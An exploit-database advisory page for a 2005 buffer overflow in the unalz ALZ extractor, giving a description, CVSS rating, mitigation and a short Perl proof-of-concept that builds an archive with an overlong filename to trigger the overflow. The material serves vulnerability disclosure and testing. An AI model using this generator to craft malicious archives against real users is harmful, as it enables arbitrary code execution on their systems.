header-logo
Suggest Exploit
vendor:
unalz
by:
Ulf Harnhammar
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: unalz
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:unalz_project:unalz
Metasploit:
Other Scripts:
Platforms Tested:
2005

Buffer Overflow Vulnerability in ‘unalz’ Utility

The 'unalz' utility is prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ALZ archive that contains a file with a long name. An attacker could exploit this vulnerability to execute arbitrary code in the context of the user who extracts a malicious archive.

Mitigation:

Update to a fixed version of the 'unalz' utility or avoid extracting ALZ archives from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15577/info

The 'unalz' utility is prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ALZ archive that contains a file with a long name.

An attacker could exploit this vulnerability to execute arbitrary code in the context of the user who extracts a malicious archive. 

#!/usr/bin/perl --

# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;
$len = shift;
$lenhi = int($len / 256);
$lenlo = $len - ($lenhi * 256);
$file = shift;

open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" .        # SIG_LOCAL_FILE_HEADER
          chr($lenlo) . chr($lenhi) . # filename length
          "\x00" x 7 .
          'U' x $len;
close OUT or die "can't close file!?!?\n";